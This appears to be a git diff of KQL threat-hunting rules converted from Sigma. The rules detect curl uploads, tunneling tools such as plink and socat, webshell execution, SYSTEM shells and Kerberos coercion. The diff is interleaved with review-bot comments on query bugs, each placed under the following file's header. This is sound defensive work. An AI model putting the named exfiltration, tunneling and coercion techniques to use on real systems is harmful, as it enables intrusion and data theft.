+// False Positives:
+// - Scripts created by developers and admins
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains " --form" or ProcessCommandLine contains " --upload-file " or ProcessCommandLine contains " --data " or ProcessCommandLine contains " --data-") or ProcessCommandLine matches regex "\\s-[FTd]\\s") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable")) and (not((ProcessCommandLine contains "://localhost" or ProcessCommandLine contains "://127.0.0.1")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql b/KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql
index 53f32716..f6c41498 100644
--- a/KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql
+++ b/KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql
@@ -1,12 +1,12 @@
-// Title: Tunneling Tool Execution
-// Author: Daniil Yugoslavskiy, oscd.community
-// Date: 2019-10-24
-// Level: medium
-// Description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.command-and-control, attack.t1041, attack.t1572, attack.t1071.001, detection.threat-hunting
-// False Positives:
-// - Legitimate administrators using one of these tools
-
-DeviceProcessEvents
+// Title: Tunneling Tool Execution
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1041, attack.t1572, attack.t1071.001, detection.threat-hunting
+// False Positives:
+// - Legitimate administrators using one of these tools
+
+DeviceProcessEvents
 | where FolderPath endswith "\\httptunnel.exe" or FolderPath endswith "\\plink.exe" or FolderPath endswith "\\socat.exe" or FolderPath endswith "\\stunnel.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql b/KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql
index a71b0772..2ceacb0f 100644
--- a/KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql
+++ b/KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql
@@ -1,10 +1,10 @@
-// Title: Winscp Execution From Non Standard Folder
-// Author: frack113
-// Date: 2025-10-12
-// Level: medium
-// Description: Detects the execution of Winscp from an a non standard folder. This could indicate the execution of Winscp portable.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1048, detection.threat-hunting
-
-DeviceProcessEvents
+// Title: Winscp Execution From Non Standard Folder
+// Author: frack113
+// Date: 2025-10-12
+// Level: medium
+// Description: Detects the execution of Winscp from an a non standard folder. This could indicate the execution of Winscp portable.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048, detection.threat-hunting
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\WinSCP.exe" or ProcessVersionInfoOriginalFileName =~ "winscp.exe") and (not(FolderPath startswith "C:\\Program Files (x86)\\WinSCP\\"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql b/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql
index 3839d209..57e847f0 100644
--- a/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql
+++ b/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql
@@ -1,13 +1,13 @@
-// Title: Process Terminated Via Taskkill
-// Author: frack113, MalGamy (Nextron Systems), Nasreddine Bencherchali
-// Date: 2021-12-26
-// Level: low
-// Description: Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity.
-// Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1489, detection.threat-hunting
-// False Positives:
-// - Expected FP with some processes using this techniques to terminate one of their processes during installations and updates
-
-DeviceProcessEvents
+// Title: Process Terminated Via Taskkill
+// Author: frack113, MalGamy (Nextron Systems), Nasreddine Bencherchali
+// Date: 2021-12-26
+// Level: low
+// Description: Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity.
+// Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489, detection.threat-hunting
+// False Positives:
+// - Expected FP with some processes using this techniques to terminate one of their processes during installations and updates
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " -im " or ProcessCommandLine contains " /im " or ProcessCommandLine contains " –im " or ProcessCommandLine contains " —im " or ProcessCommandLine contains " ―im " or ProcessCommandLine contains " -pid " or ProcessCommandLine contains " /pid " or ProcessCommandLine contains " –pid " or ProcessCommandLine contains " —pid " or ProcessCommandLine contains " ―pid ") and (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f " or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " /f" or ProcessCommandLine endswith " –f" or ProcessCommandLine endswith " —f" or ProcessCommandLine endswith " ―f") and (FolderPath endswith "\\taskkill.exe" or ProcessVersionInfoOriginalFileName =~ "taskkill.exe")) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp") and InitiatingProcessFolderPath endswith ".tmp")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql b/KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql
index 95fb738b..d50ad721 100644
--- a/KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql
+++ b/KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql
@@ -1,12 +1,12 @@
-// Title: WebDAV Temporary Local File Creation
-// Author: Micah Babinski
-// Date: 2023-08-21
-// Level: medium
-// Description: Detects the creation of WebDAV temporary files with potentially suspicious extensions
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.resource-development, attack.t1584, attack.t1566, detection.threat-hunting
-// False Positives:
-// - Legitimate use of WebDAV in an environment
-
-DeviceFileEvents
+// Title: WebDAV Temporary Local File Creation
+// Author: Micah Babinski
+// Date: 2023-08-21
+// Level: medium
+// Description: Detects the creation of WebDAV temporary files with potentially suspicious extensions
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.resource-development, attack.t1584, attack.t1566, detection.threat-hunting
+// False Positives:
+// - Legitimate use of WebDAV in an environment
+
+DeviceFileEvents
 | where FolderPath contains "\\AppData\\Local\\Temp\\TfsStore\\Tfs_DAV\\" and (FolderPath endswith ".7z" or FolderPath endswith ".bat" or FolderPath endswith ".dat" or FolderPath endswith ".ico" or FolderPath endswith ".js" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".rar" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".zip")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql b/KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql
index 61ecdb7a..b3f171fb 100644
--- a/KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql
+++ b/KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql
@@ -1,12 +1,12 @@
-// Title: SMB over QUIC Via Net.EXE
-// Author: frack113
-// Date: 2023-07-21
-// Level: medium
-// Description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.
-// MITRE Tactic: Lateral Movement
-// Tags: attack.lateral-movement, attack.t1570, detection.threat-hunting
-// False Positives:
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: SMB over QUIC Via Net.EXE
+// Author: frack113
+// Date: 2023-07-21
+// Level: medium
+// Description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1570, detection.threat-hunting
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "/TRANSPORT:QUIC" and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql b/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql
index b8755fb6..4f9ab5da 100644
--- a/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql
+++ b/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql
@@ -1,13 +1,13 @@
-// Title: Execution From Webserver Root Folder
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-01-16
-// Level: medium
-// Description: Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1505.003, detection.threat-hunting
-// False Positives:
-// - Various applications
-// - Tools that include ping or nslookup command invocations
-
-DeviceProcessEvents
+// Title: Execution From Webserver Root Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003, detection.threat-hunting
+// False Positives:
+// - Various applications
+// - Tools that include ping or nslookup command invocations
+
+DeviceProcessEvents
 | where (FolderPath contains "\\wwwroot\\" or FolderPath contains "\\wmpub\\" or FolderPath contains "\\htdocs\\") and (not(((FolderPath contains "bin\\" or FolderPath contains "\\Tools\\" or FolderPath contains "\\SMSComponent\\") and InitiatingProcessFolderPath endswith "\\services.exe")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql b/KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql
index 630a326e..f6442fe9 100644
--- a/KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql
+++ b/KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql
@@ -1,12 +1,12 @@
-// Title: Shell Context Menu Command Tampering
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-03-06
-// Level: low
-// Description: Detects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, detection.threat-hunting
-// False Positives:
-// - Likely from new software installation suggesting to add context menu items. Such as "PowerShell", "Everything", "Git", etc.
-
-DeviceRegistryEvents
+// Title: Shell Context Menu Command Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-03-06
+// Level: low
+// Description: Detects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.threat-hunting
+// False Positives:
+// - Likely from new software installation suggesting to add context menu items. Such as "PowerShell", "Everything", "Git", etc.
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Software\\Classes*" and RegistryKey endswith "\\shell*" and RegistryKey endswith "\\command*"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql b/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql
index acba7761..8e46c493 100644
--- a/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql
+++ b/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql
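Review bot: The `| where` line on the new side of this hunk can never match: `endswith` compares a literal string, so the `*` in `"\\Software\\Classes*"`, `"\\shell*"` and `"\\command*"` is treated as a real asterisk, and a single RegistryKey cannot end with all three values at once, so the rule is silent on every event. The asterisks look like an untranslated Sigma wildcard; the intent reads as a key path containing the first two segments and ending with the third, roughly `| where RegistryKey contains "\\Software\\Classes\\" and RegistryKey contains "\\shell\\" and RegistryKey endswith "\\command"`. Worth confirming against the Sigma source, and checking the other converted rules for the same literal-`*` artifact before relying on them.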
@@ -1,14 +1,14 @@
-// Title: Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024-09-02
-// Level: low
-// Description: Detects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory.
-// The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object.
-// Investigation of the loading application and its behavior is required to determining if its malicious.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting
-// False Positives:
-// - Some installers might generate false positives, apply additional filters accordingly.
-
-DeviceImageLoadEvents
+// Title: Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-09-02
+// Level: low
+// Description: Detects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory.
+// The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object.
+// Investigation of the loading application and its behavior is required to determining if its malicious.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting
+// False Positives:
+// - Some installers might generate false positives, apply additional filters accordingly.
+
+DeviceImageLoadEvents
 | where (FolderPath endswith "\\taskschd.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "taskschd.dll") and (InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Desktop\\" or InitiatingProcessFolderPath contains "\\Downloads\\")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql b/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql
index 665416c7..3685b3c2 100644
--- a/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql
+++ b/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql
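Review bot: In the DeviceImageLoadEvents filter, `InitiatingProcessVersionInfoOriginalFileName =~ "taskschd.dll"` describes the process doing the loading rather than the loaded image, so that alternative will not fire for a DLL load and the rule effectively reduces to the `FolderPath endswith` branch. If the second branch is meant as a name match on the image, `FileName =~ "taskschd.dll"` is the image-side column in this table; the Sigma source presumably matched the loaded module's name, which is worth confirming. The header lines the hunk rewrites are otherwise unchanged.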
@@ -1,10 +1,10 @@
-// Title: Elevated System Shell Spawned
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2023-11-23
-// Level: medium
-// Description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1059, detection.threat-hunting
-
-DeviceProcessEvents
+// Title: Elevated System Shell Spawned
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2023-11-23
+// Level: medium
+// Description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1059, detection.threat-hunting
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "powershell_ise.EXE", "pwsh.dll", "Cmd.Exe"))) and (LogonId =~ "0x3e7" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql b/KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql
index e2b6695b..be6f72c5 100644
--- a/KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql
+++ b/KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql
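Review bot: `LogonId =~ "0x3e7"` in the `| where` line compares a numeric column against a string: in DeviceProcessEvents LogonId is a long, so this case-insensitive string comparison will either be rejected by the query engine or never identify the SYSTEM logon session, and the rule does not fire. The hex literal presumably comes straight from the Sigma source; the decimal form of that well-known session id is 999, so `LogonId == 999` alongside the existing AccountName check is the working equivalent. Confirm against the tenant's schema before merging, since a silent non-match here loses the whole detection.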
@@ -1,14 +1,14 @@
-// Title: Creation of an Executable by an Executable
-// Author: frack113
-// Date: 2022-03-09
-// Level: low
-// Description: Detects the creation of an executable by another executable.
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1587.001, detection.threat-hunting
-// False Positives:
-// - Software installers
-// - Update utilities
-// - 32bit applications launching their 64bit versions
-
-DeviceFileEvents
+// Title: Creation of an Executable by an Executable
+// Author: frack113
+// Date: 2022-03-09
+// Level: low
+// Description: Detects the creation of an executable by another executable.
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001, detection.threat-hunting
+// False Positives:
+// - Software installers
+// - Update utilities
+// - 32bit applications launching their 64bit versions
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith ".exe" and FolderPath endswith ".exe") and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Windows Defender\\") or (InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework" and InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and FolderPath contains ":\\Windows\\assembly") or (InitiatingProcessFolderPath endswith ":\\Windows\\System32\\msiexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\cleanmgr.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\dxgiadaptercache.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\Dism.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wuauclt.exe") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\GitHubDesktop\\Update.exe" and FolderPath contains "\\AppData\\Local\\SquirrelTemp\\") or ((InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and FolderPath contains ":\\Windows\\assembly\\NativeImages_") or ((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\") or (FolderPath contains ":\\Program Files\\" or FolderPath contains ":\\Program Files (x86)\\")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and (FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\stage\\Teams.exe" or FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\stage\\Squirrel.exe" or FolderPath endswith "\\AppData\\Local\\Microsoft\\SquirrelTemp\\tempb\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\") or (InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" and InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\svchost.exe" and FolderPath contains ":\\Windows\\SoftwareDistribution\\Download\\") or (InitiatingProcessFolderPath endswith ":\\Windows\\system32\\svchost.exe" and (FolderPath contains ":\\WUDownloadCache\\" and FolderPath contains "\\WindowsUpdateBox.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" and InitiatingProcessFolderPath endswith "\\Microsoft VS Code\\Code.exe" and FolderPath contains "\\.vscode\\extensions\\") or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" or (InitiatingProcessFolderPath contains ":\\WINDOWS\\TEMP\\" or FolderPath contains ":\\WINDOWS\\TEMP\\") or (InitiatingProcessFolderPath contains ":\\WINDOWS\\SoftwareDistribution\\Download\\" and InitiatingProcessFolderPath endswith "\\WindowsUpdateBox.Exe" and FolderPath contains ":\\$WINDOWS.~BT\\Sources\\")))) and (not(((InitiatingProcessFolderPath endswith "\\ChromeSetup.exe" and FolderPath contains "\\Google") or (InitiatingProcessFolderPath contains "\\Python27\\python.exe" and (FolderPath contains "\\Python27\\Lib\\site-packages\\" or FolderPath contains "\\Python27\\Scripts\\" or FolderPath contains "\\AppData\\Local\\Temp\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\SquirrelTemp\\Update.exe" and FolderPath contains "\\AppData\\Local"))))
\ No newline at end of file
diff --git a/KQL/rules/Collection/7zip_compressing_dump_files.kql b/KQL/rules/Collection/7zip_compressing_dump_files.kql
index 5d6b1c5e..97b1da0f 100644
--- a/KQL/rules/Collection/7zip_compressing_dump_files.kql
+++ b/KQL/rules/Collection/7zip_compressing_dump_files.kql
@@ -1,13 +1,13 @@
-// Title: 7Zip Compressing Dump Files
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-27
-// Level: medium
-// Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1560.001
-// False Positives:
-// - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally
-// - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting
-
-DeviceProcessEvents
+// Title: 7Zip Compressing Dump Files
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-27
+// Level: medium
+// Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally
+// - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql b/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql
index af43a994..8d1920bf 100644
--- a/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql
+++ b/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql
@@ -1,16 +1,16 @@
-// Title: Attempts of Kerberos Coercion Via DNS SPN Spoofing
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-06-20
-// Level: high
-// Description: Detects the presence of "UWhRC....AAYBAAAA" pattern in command line.
-// The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
-// Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
-// It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records
-// to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.
-// If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,
-// or checking for the presence of such records through the `nslookup` command.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.credential-access, attack.persistence, attack.privilege-escalation, attack.t1557.001, attack.t1187
-
-DeviceProcessEvents
+// Title: Attempts of Kerberos Coercion Via DNS SPN Spoofing
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-20
+// Level: high
+// Description: Detects the presence of "UWhRC....AAYBAAAA" pattern in command line.
+// The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
+// Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
+// It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records
+// to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.
+// If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,
+// or checking for the presence of such records through the `nslookup` command.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.credential-access, attack.persistence, attack.privilege-escalation, attack.t1557.001, attack.t1187
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "UWhRCA" and ProcessCommandLine contains "BAAAA"
\ No newline at end of file
diff --git a/KQL/rules/Collection/audio_capture_via_powershell.kql b/KQL/rules/Collection/audio_capture_via_powershell.kql
index 0fdfc724..86e5aa7d 100644
--- a/KQL/rules/Collection/audio_capture_via_powershell.kql
+++ b/KQL/rules/Collection/audio_capture_via_powershell.kql
@@ -1,12 +1,12 @@
-// Title: Audio Capture via PowerShell
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-10-24
-// Level: medium
-// Description: Detects audio capture via PowerShell Cmdlet.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1123
-// False Positives:
-// - Legitimate audio capture by legitimate user.
-
-DeviceProcessEvents
+// Title: Audio Capture via PowerShell
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects audio capture via PowerShell Cmdlet.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1123
+// False Positives:
+// - Legitimate audio capture by legitimate user.
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "WindowsAudioDevice-Powershell-Cmdlet" or ProcessCommandLine contains "Toggle-AudioDevice" or ProcessCommandLine contains "Get-AudioDevice " or ProcessCommandLine contains "Set-AudioDevice " or ProcessCommandLine contains "Write-AudioDevice "
\ No newline at end of file
diff --git a/KQL/rules/Collection/audio_capture_via_soundrecorder.kql b/KQL/rules/Collection/audio_capture_via_soundrecorder.kql
index 631ccf07..c8a4540e 100644
--- a/KQL/rules/Collection/audio_capture_via_soundrecorder.kql
+++ b/KQL/rules/Collection/audio_capture_via_soundrecorder.kql
@@ -1,12 +1,12 @@
-// Title: Audio Capture via SoundRecorder
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019-10-24
-// Level: medium
-// Description: Detect attacker collecting audio via SoundRecorder application.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1123
-// False Positives:
-// - Legitimate audio capture by legitimate user.
-
-DeviceProcessEvents
+// Title: Audio Capture via SoundRecorder
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Detect attacker collecting audio via SoundRecorder application.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1123
+// False Positives:
+// - Legitimate audio capture by legitimate user.
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "/FILE" and FolderPath endswith "\\SoundRecorder.exe"
\ No newline at end of file
diff --git a/KQL/rules/Collection/automated_collection_command_prompt.kql b/KQL/rules/Collection/automated_collection_command_prompt.kql
index 4bbf1e5c..60b39179 100644
--- a/KQL/rules/Collection/automated_collection_command_prompt.kql
+++ b/KQL/rules/Collection/automated_collection_command_prompt.kql
@@ -1,10 +1,10 @@
-// Title: Automated Collection Command Prompt
-// Author: frack113
-// Date: 2021-07-28
-// Level: medium
-// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1119, attack.credential-access, attack.t1552.001
-
-DeviceProcessEvents
+// Title: Automated Collection Command Prompt
+// Author: frack113
+// Date: 2021-07-28
+// Level: medium
+// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1119, attack.credential-access, attack.t1552.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".docx" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xlsx" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".pptx" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".txt") and ((ProcessCommandLine contains "dir " and ProcessCommandLine contains " /b " and ProcessCommandLine contains " /s ") or ((ProcessCommandLine contains " /e " or ProcessCommandLine contains " /si ") and ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"))
\ No newline at end of file
diff --git a/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql b/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql
